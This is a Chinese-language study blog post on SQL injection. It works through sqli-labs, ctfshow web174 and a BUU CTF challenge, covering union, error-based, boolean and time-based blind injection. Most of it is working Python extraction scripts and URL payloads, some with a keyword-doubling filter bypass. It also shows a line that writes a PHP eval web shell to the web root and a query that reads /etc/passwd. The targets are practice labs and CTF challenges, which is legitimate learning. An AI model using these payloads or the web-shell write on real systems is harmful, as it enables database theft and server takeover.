盲注学习

盲注学习

五月 07, 2022

sqli-labs

搭建

https://hub.docker.com/r/acgpiano/sqli-labs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
docker pull acgpiano/sqli-labs
docker run -dt --name sqli-lab -p [PORT]:80 acgpiano/sqli-labs:latest
docker exec -it bin/sh
实时更新日志文件 tail -f access.log
当前用户:select user()
数据库版本:select version() , select @@version
数据库名:select database()
操作系统:select @@version_compile_os
所有变量:show variables
单个变量:select @@secure_file_priv , show variables like 'secure_file%'
爆字段数:order by 1... ,group by 1...
查库名:select group_concat(schema_name) from information_schema.schemata
查表名:select group_concat(table_name) from information_schema.tables where table_schema='库名'
查字段:select group_concat(column_name) from information_schema.columns where table_name='表名'
读取某行:select * from mysql.user limit n,m // limit m offset n (第n行之后m行,第一行为0
读文件:select load_file('/etc/passwd')
写文件:select '<?php @eval($POST[a]);?>' into outfile '/var/www/html/a.php' //该处文件名无法使用16进制绕过

DATABASE() 函数返回当前数据库的名称,或者默认数据库。 如果查询的表不在默认数据库内,需要在表明前面加上数据库名称。

information_schema 是 mysql 自带的一张表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。

Page 1

个人理解 先正常查询如果有正确回显 则尝试查询后跟随 ‘ “ 等 报错的即为闭合符号

Less - 1/2(无单引号)/3( ‘) )/4( “ )

首先尝试单双引号

1
2
3
4
5
6
7
8
首先 联合注入 
?id=-1%27union%20select%201,2,3--+ 、//发现只有2 3 能显示
?id=-1%27union%20select%201,database(),3--+ security
?id=-1%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3--+
emails,referers,uagents,users
?id=-1%27union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27),3--+
id,username,password
?id=-1'union select 1,(select group_concat(username) from security.users), (select group_concat(password) from security.users)--+

Less - 5/6(“ 闭合)

初学bool盲注 遇到了很多奇奇怪怪的错误

最多的错误就是 substr((select ..)) 要有两对括号

1x师傅给的脚本比较容易看懂初学者可以研究一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
?id=1%20and%20length(database())=8%20--+
?id=1%27%20and%20substr((select%20database()),1,1)=%27s%27%20--+
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:1x
# datetime:2022/4/23 23:38
# software: PyCharm

import sys
import requests, time
d='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890,-{}'

url="http://49.235.100.251:10086/Less-5/?id={}"
payload = "' and ascii(substr((select database()),%s,1))=%s --+"
payload1 = "' and ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=),%s,1))=%s --+"

database=''
print("Start to retrive the database")
for i in range(1, 9):
for ii in d:#range(32, 127):
response = requests.get(url.format('1'+payload % (i, ord(ii))))
time.sleep(0.1)
#print(response.text)
if 'are' in response.text:
database+=ii#chr(ii)
break
else:
pass
#response.close()
print("the database is :%s" % database)
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:l0sE2
# datetime:2022/4/29 23:54
# software: PyCharm

import requests , time

url="http://49.235.100.251:10086/Less-5/?id="
def leng(url):
database = ''
payload = "1' and length((select database())) = {} --+"
payload1 = "1' and length((select group_concat(table_name) from information_schema.tables where table_schema= 'security')) = {} --+"
for i in range(1,100):
response = requests.get(url + payload1.format(i))
#print(response.text)
if 'are' in response.text:
database+= str(i)
return database
else:
pass

def BA(url):
bala = ''
payload = "1' and ascii(substr((select database()),{},1)) = {} --+"
payload1 = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema= 'security'),{},1)) = {} --+"
#n = int(leng(url))
for i in range(0, int(leng(url)) +1):
for j in range(1,127):
response = requests.get(url + payload1.format(i,j))
if 'are' in response.text:
bala += chr(j)
print(bala)
print(i)
break
else:
pass

print(BA(url))
#print(leng(url))
1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)
-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= 'security')),1)
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:l0sE2
# datetime:2022/5/2 18:45
# software: PyCharm
import requests , time
#多种选择
url="http://49.235.100.251:10086/Less-5/?id="
def leng(url):
database = ''
payload2 = "1' and length((select database())) = {} and if(1=1,sleep(5),1)--+"
payload = "1' and if(length((select database())) = {} , sleep(5) , 1 )--+"
payload1 = "1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema= 'security')) = {} , sleep(5) , 1 ) --+"
for i in range(1,100):
F__ktime = time.time()
response = requests.get(url + payload1.format(i))
#print(response.text)
if time.time() - F__ktime > 1:
database+= str(i)
return database
else:
pass

def BA(url):
bala = ''
payload = "1' and ascii(substr((select database()),{},1)) = {} and if(1=1,sleep(5),1)--+"
payload1 = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema= 'security'),{},1)) = {} and if(1=1,sleep(5),1)--+"
n = int(leng(url))
for i in range(0,n+1):
for j in range(1,127):
F__ktime = time.time()
response = requests.get(url + payload1.format(i,j))
if time.time() - F__ktime > 1:
bala += chr(j)
print(bala)
#print(i)
break
else:
pass

print(BA(url))
#print(leng(url))

Ctfshow web174 二分法盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:l0sE2
# datetime:2022/5/3 16:10
# software: PyCharm
import requests , time

url="http://143125bc-9b73-4ce2-b828-243c998d121b.challenge.ctf.show/api/v4.php?id="
def leng(url):
database = ''
payload = "1' and length((select database())) > {} --+"
payload1 = "1' and length((select group_concat(table_name) from information_schema.tables where table_schema= 'ctfshow_web')) > {} --+"
payload2 = "1' and length((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_user4')) > {} --+"
payload3 = "1' and length((select group_concat(username) from ctfshow_user4)) > {} --+"
payload4 = "1' and length((select group_concat(password) from ctfshow_user4 where username='flag')) > {} --+"
max = 500
min = 0
mid = (max + min) // 2
while max > min + 1:
response = requests.get(url + payload4.format(mid))
if 'admin' in response.text:
min = mid
else:
max = mid
mid = (max + min) // 2
database += str(max)
return database

def BA(url):
bala = ''
payload = "1' and ascii(substr((select database()),{},1)) > {} --+"
payload1 = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema= 'ctfshow_web'),{},1)) > {} --+"
payload2 = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_user4'),{},1)) > {} --+"
payload3 = "1' and ascii(substr((select group_concat(username) from ctfshow_user4),{},1)) > {} --+"
payload4 = "1' and ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),{},1)) > {} --+"

n = int(leng(url))
print(n)
for i in range(1, n + 1):
max = 127
min = 32
mid = (max + min) // 2
while max > min + 1:
response = requests.get(url + payload4.format(i, mid))
if 'admin' in response.text:
min = mid
else:
max = mid
mid = (max + min) // 2
bala += chr(max)
print(max)
print(bala)
print(i)
BA(url)
#print(leng(url))

BUU babysql 函数 比较符被过滤如何 构造二分法脚本

本题目原本考的是replace过滤后的联合注入 ‘>’也被过滤 但真的就没有办法是用二分法了么

greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值

利用函数绕过 > 过滤从而进行构造

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:l0sE2
# datetime:2022/5/6 22:27
# software: PyCharm
import requests , time
# union > from or where information(or) ascii substr greatest; 坏b全给过滤了
url="http://b83510ca-eaf7-49f5-ac8f-e77cbf40f2df.node4.buuoj.cn:81/check.php?username="
def leng(url):
database = ''
payload = "1' || greagreatesttest(length((seselectlect group_concat(schema_name) frfromom infoorrmation_schema.schemata)),{}) = {} -- &password=1"
payload1 = "1' || greagreatesttest(length((seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema= 'ctf')),{}) = {} -- &password=1"
payload2 = "1' || greagreatesttest(length((selselectect group_concat(column_name) frorom infoorrmation_schema.columns whewherere table_name='Flag')),{}) = {} -- &password=1"
payload3 = "1' || greagreatesttest(length((selselectect concat(flag) frorom ctf.Flag)),{}) = {} -- &password=1"
max = 127
min = 0
mid = (max + min) // 2
while max > min + 1:
response = requests.get(url + payload3.format(mid,mid))
#print(response.text)
if 'admin' in response.text:
max = mid
else:
min = mid
mid = (max + min) // 2
database += str(max)
return database


def BA(url):
bala = ''
payload = "1' || greagreatesttest(asasciicii(subsubstrstr((seselectlect group_concat(schema_name) frfromom infoorrmation_schema.schemata),{},1)),{}) = {} -- &password=1"
payload1 = "1' || greagreatesttest(asasciicii(subsubstrstr((selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='ctf'),{},1)),{}) = {} -- &password=1"
payload2 = "1' || greagreatesttest(asasciicii(subsubstrstr((selselectect group_concat(column_name) frorom infoorrmation_schema.columns wheorre table_name='Flag'),{},1)),{}) = {} -- &password=1"
payload3 = "1' || greagreatesttest(asasciicii(subsubstrstr((selselectect concat(flag) frorom ctf.Flag),{},1)),{}) = {} -- &password=1"
n = int(leng(url))
print(n)
for i in range(1,n+1):
max = 127
min = 0
mid = (max + min )//2
while max > min + 1 :
time.sleep(0.1)
response = requests.get(url + payload3.format(i,mid,mid))
#print(response.text)
if 'admin' in response.text:
max = mid
else:
min = mid
mid = (max + min) // 2
bala += chr(max)
print('database=====>',bala)
print(i)
BA(url)
#print(leng(url))